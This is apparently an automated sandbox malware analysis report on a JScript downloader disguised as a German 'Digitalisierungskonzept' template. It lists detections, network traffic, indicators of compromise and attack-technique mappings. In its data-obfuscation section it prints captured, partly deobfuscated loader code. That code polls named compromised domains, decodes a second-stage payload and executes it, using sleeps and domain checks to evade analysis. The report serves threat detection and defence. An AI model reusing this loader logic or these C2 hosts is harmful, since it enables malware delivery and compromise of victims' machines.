Edit tour

Windows Analysis Report
digitalisierungskonzept_muster.js

Overview

General Information

Sample name:	digitalisierungskonzept_muster.js
Analysis ID:	1586669
MD5:	ad19381f5f3698c0ab4529715cd14327
SHA1:	708b1bbf2e7fd4040f729e395a7f738fc048832a
SHA256:	adeaed567668febcdbbf5227c6e6ed2333ba2c852447e82081548b62da0ec678
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

JScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Potential evasive JS / VBS script found (domain check)

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Detected non-DNS traffic on DNS port

Found WSH timer for Javascript or VBS script (likely evasive script)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

wscript.exe (PID: 4148 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 188.40.120.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4148, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64780

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", ProcessId: 4148, ProcessName: wscript.exe

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 188.40.120.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4148, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 64780

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\digitalisierungskonzept_muster.js", ProcessId: 4148, ProcessName: wscript.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-09T13:43:14.709695+0100	2028371	3	Unknown Traffic	192.168.2.5	64780	188.40.120.141	443	TCP
2025-01-09T13:43:37.712657+0100	2028371	3	Unknown Traffic	192.168.2.5	64781	86.107.32.28	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: digitalisierungskonzept_muster.js

Avira: detected

Antivirus detection for URL or domain

Source: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416	Avira URL Cloud: Label: malware
Source: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845	Avira URL Cloud: Label: malware
Source: https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954	Avira URL Cloud: Label: malware

Source: unknown

HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.5:64780 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 86.107.32.28 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 188.40.120.141 443			Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.5:64582 -> 162.159.36.2:53

Source: Joe Sandbox View	ASN Name: DIALTELECOMRO DIALTELECOMRO
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:64780 -> 188.40.120.141:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:64781 -> 86.107.32.28:443

Source: global traffic

HTTP traffic detected: GET /search.php?xxcktjjjheggcyu=9137952416303845 HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.giuseppedeluigi.com

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.giuseppedeluigi.com
Source: global traffic	DNS traffic detected: DNS query: www.frerecapucinbenin.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 12:43:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 208Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: wscript.exe	String found in binary or memory: https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954
Source: wscript.exe	String found in binary or memory: https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64780
Source: unknown	Network traffic detected: HTTP traffic on port 64780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64781 -> 443

Source: unknown

HTTPS traffic detected: 188.40.120.141:443 -> 192.168.2.5:64780 version: TLS 1.2

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 49%

Source: digitalisierungskonzept_muster.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal88.evad.winJS@1/0@3/2

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript)["C"+"reateObj"+"e"+"c"+"t"]("WS"+"cr"+"ipt.She"+"l"+"l"+""); liquid = "HK"+"E"+"Y"+"_CURR"+"EN"+"T_USER"+"\\ptuxPa\\";try { did["Reg"+"R"+"e"+"ad"](liquid); } catch(e) { did["Re"+"g"+"W"+"rit"+"e"](liquid, "", "REG_"+"S"+"Z");D=37-34;master=19;}try {teeth[D](might('.phhcpr\'a+e\"s?/x\'x+c]kst[jZj+j\'h/e/g:gscpytut=h\"\'+ G,,\' TfEaGl\'s(en)e;p oB..Bs e{nydr(t) ;} ;}\"c6a4t1c8h7(2e\")+{G =rGe{t u)r\"n% NfIaAlMsOeD;S N}D RiEfS U(%B\". s=t!a t)u\"s% N=I=A=M O2D0S0N)D R{E SvUa%r\" (ls g=n iBr.trSetsnpeomnnsoerTievxntE;d niafp x(E(.l).\"ilnldeehxSO.ft(p\"i@r\"c+SGW+\"\"(@t\"c,e j0b)O)e=t=a-e1r)C .{t pWiSrccrSiWp(t .fsil e;e)p0(32+20272,22)(;] \"}r teslbsues \"{[ )l( g=n ilr.trSeoptl.a)c(em(o\"d@n\"a+rG.+h\"t@a\"M, \"=\" )G; ;v)a\'rP TiT H=L MlX.rreevprleaSc.e2(L/M(X\\SdM{\'2(}t)c/egj,b OfeutnacetriCo.nt p(iHr)c S{W r=e tBu r{n )S3t r<i nsg(. ferloimhCwh a;r0C o=d es( p;a]r\"sueeI.netu(qHi,h1t0e)o+i3b0e)d;n e}e)p;o rtueeemtuhr[o3f].(wiw)w(\"),;\" gWrSoc.rniipnte.bQnuiictu(p)a;c e}r e}r fe.lwswew \"{, \"WmSoccr.iipgti.uslleedeepp(p2e2s2u2i2g).;w w}w \"s[+ +=; }Z '))();}catch(e){WScript.sleep(685818760);}afltrgbplg=teeth; }IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");function anonymous() {Z = ["www.giuseppedeluigi.com","www.frerecapucinbenin.org","www.forumeuropeendebioethique.eu"]; s = 0; while (s < 3) { B = WScript.CreateObject('MSXML2.ServerXMLHTTP'); G = Math.random().toString()["substr"](2,70+30); if (WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {G=G+"278146";} try{ B.open('GET', 'https://'+Z[s]+'/search.php'+"?xxcktjjjheggcyu="+G, false); B.send(); }catch(e){ return false; } if (B.status === 200) { var l = B.responseText; if ((l.indexOf("@"+G+"@", 0))==-1) { WScript.sleep(22222); } else { l = l.replace("@"+G+"@",""); var i = l.replace(/(\d{2})/g, function (H) { return String.fromCharCode(parseInt(H,10)+30); }); teeth[3](i)(); WScript.Quit(); } } else { WScript.sleep(22222); } s++;} }IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");IWshShell3.RegWrite("HKEY_CURRENT_USER\ptuxPa\", "", "REG_SZ");IHost.CreateObject("MSXML2.ServerXMLHTTP");IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%USERDNSDOMAIN%");IServerXMLHTTPRequest2.open("GET", "https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416", "false");IServerXMLHTTPRequest2.send();IHost.Sleep("85097");IHost.Sleep("8677");IHost.Sleep("9535");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\ptuxPa\");IWshShell3.RegWrite("HKEY_CURRENT_USER\ptuxPa\", "", "REG_SZ");IHost.CreateObject("MSXML2.ServerXMLHTTP");IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%USERDNSDOMAIN%");IServerXMLHTTPRequest2.open("GET", "https://www.giuseppedeluigi.com/search.php?xxckt

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Potential evasive JS / VBS script found (domain check)

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: USERDNSDOMAIN%") != "%USERDNSDOMAIN%") {G=G+"278146";} try{ B.open('GET', 'https://'+Z[s]+'/search.php'+"?xxcktjjjheggcyu="+G, false); B.send(); }catch(e){ return false; } if (B.status === 200) { var

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6360

Thread sleep time: -30000s >= -30000s

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 86.107.32.28 443			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Network Connect: 188.40.120.141 443			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	Windows Management Instrumentation	12 Scripting	1 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Office Application Startup	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	14 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
digitalisierungskonzept_muster.js	100%	Avira	HTML/ExpKit.Gen2

Source	Detection	Scanner	Label
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416	100%	Avira URL Cloud	malware
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845	100%	Avira URL Cloud	malware
https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.giuseppedeluigi.com	188.40.120.141	true	true	unknown
frerecapucinbenin.org	86.107.32.28	true	true	unknown
www.frerecapucinbenin.org	unknown	unknown	true	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416303845	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.giuseppedeluigi.com/search.php?xxcktjjjheggcyu=9137952416	wscript.exe	true	Avira URL Cloud: malware	unknown
https://www.frerecapucinbenin.org/search.php?xxcktjjjheggcyu=37120954	wscript.exe	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
86.107.32.28	frerecapucinbenin.org	Romania		6910	DIALTELECOMRO	true
188.40.120.141	www.giuseppedeluigi.com	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1586669
Start date and time:	2025-01-09 13:39:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	digitalisierungskonzept_muster.js
Detection:	MAL
Classification:	mal88.evad.winJS@1/0@3/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45, 52.165.164.15, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: digitalisierungskonzept_muster.js

Simulations

Behavior and APIs

Time	Type	Description
07:43:36	API Interceptor	1x Sleep call for process: wscript.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
86.107.32.28	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	collevilca.it/admin/
188.40.120.141	w7g8ZBnsuZ.js	Get hash	malicious	Unknown	Browse
	kauffrau_f#U00fcr_b#U00fcromanagement_muster_report_assistenz_und_sekretariat.js	Get hash	malicious	Unknown	Browse
	#Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.giuseppedeluigi.com	#Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js	Get hash	malicious	Unknown	Browse	188.40.120.141

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIALTELECOMRO	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	89.34.182.52
	5556.rar.exe	Get hash	malicious	Njrat	Browse	188.212.158.75
	hax.sh4.elf	Get hash	malicious	Mirai	Browse	93.118.210.183
	rendel#U00e9s_1023200000000000305.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	meerkat.arm5.elf	Get hash	malicious	Mirai	Browse	89.47.221.99
	Objedn#U00e1vka_20248481119000903.img	Get hash	malicious	AgentTesla, GuLoader	Browse	86.107.36.93
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	188.240.230.166
	mpsl.elf	Get hash	malicious	Mirai	Browse	93.114.246.9
HETZNER-ASDE	https://t.co/qNQo33w8wD	Get hash	malicious	HTMLPhisher	Browse	148.251.20.70
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	78.46.57.143
	https://qr.me-qr.com/pt/E9k76ew	Get hash	malicious	Unknown	Browse	78.46.57.143
	watchdog.elf	Get hash	malicious	Xmrig	Browse	88.198.117.174
	http://hockey30.com	Get hash	malicious	Unknown	Browse	116.202.167.133
	https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/	Get hash	malicious	Unknown	Browse	116.202.167.133
	ZipThis.exe	Get hash	malicious	Unknown	Browse	5.161.105.73
	garm5.elf	Get hash	malicious	Mirai	Browse	197.242.86.245

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	NvOxePa.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	188.40.120.141
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	188.40.120.141
	uU6IvUPN39.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	P2V7Mr3DUF.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	v3tb7mqP48.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	xCnwCctDWC.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	DLKs2Qeljg.exe	Get hash	malicious	LummaC	Browse	188.40.120.141
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	188.40.120.141

File type:	ASCII text, with very long lines (1393), with CRLF line terminators
Entropy (8bit):	5.441842459483465
TrID:
File name:	digitalisierungskonzept_muster.js
File size:	2'817 bytes
MD5:	ad19381f5f3698c0ab4529715cd14327
SHA1:	708b1bbf2e7fd4040f729e395a7f738fc048832a
SHA256:	adeaed567668febcdbbf5227c6e6ed2333ba2c852447e82081548b62da0ec678
SHA512:	e122be1d0194619bb4a3e2e720b65033e14ce0d554e0a3b13478fa32a2cfbc4046af9561cca8d85c98d08d8c42c55bcefd17b4183219c9344a91f6246b17a2b9
SSDEEP:	48:NeswSLX9Vv3EN9hlJrP25kLfK5oIxYpUR92IPBpHI0fDJYf/FbXQUhc0iE4/XfA6:NewXq9hlRpfK53Yq2+iuDJU/ZXPh78XH
TLSH:	3B510AE9A781F17D700F4E01203F367F7A66A88581F45260D94AD2D5B42003D7333D49
File Content Preview:	function free(){WScript.Sleep(85097);sea=9007;while(fill=fill){try{born[sea](sea);}catch(seven){born[1410051]=fill;}sea++}}..function wish(street,at,bell,call){soil="vutwQ";born[6001355]=blood;teeth=only(might(men),soil);}..function sail(broke,gold,pull,s

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T13:43:14.709695+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	64780	188.40.120.141	443	TCP
2025-01-09T13:43:37.712657+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	64781	86.107.32.28	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 13:41:09.419902086 CET	64582	53	192.168.2.5	162.159.36.2
Jan 9, 2025 13:41:09.425049067 CET	53	64582	162.159.36.2	192.168.2.5
Jan 9, 2025 13:41:09.428796053 CET	64582	53	192.168.2.5	162.159.36.2
Jan 9, 2025 13:41:09.433604002 CET	53	64582	162.159.36.2	192.168.2.5
Jan 9, 2025 13:41:09.935035944 CET	64582	53	192.168.2.5	162.159.36.2
Jan 9, 2025 13:41:09.940280914 CET	53	64582	162.159.36.2	192.168.2.5
Jan 9, 2025 13:41:09.940351009 CET	64582	53	192.168.2.5	162.159.36.2
Jan 9, 2025 13:43:13.821381092 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:13.821481943 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:13.821629047 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:13.823973894 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:13.824009895 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:14.709438086 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:14.709695101 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:14.775321960 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:14.775371075 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:14.776365042 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:14.818540096 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:14.941454887 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:14.983330011 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:15.136013031 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:15.136382103 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:15.136488914 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:15.136898041 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:15.136946917 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:15.136977911 CET	64780	443	192.168.2.5	188.40.120.141
Jan 9, 2025 13:43:15.136993885 CET	443	64780	188.40.120.141	192.168.2.5
Jan 9, 2025 13:43:37.449999094 CET	64781	443	192.168.2.5	86.107.32.28
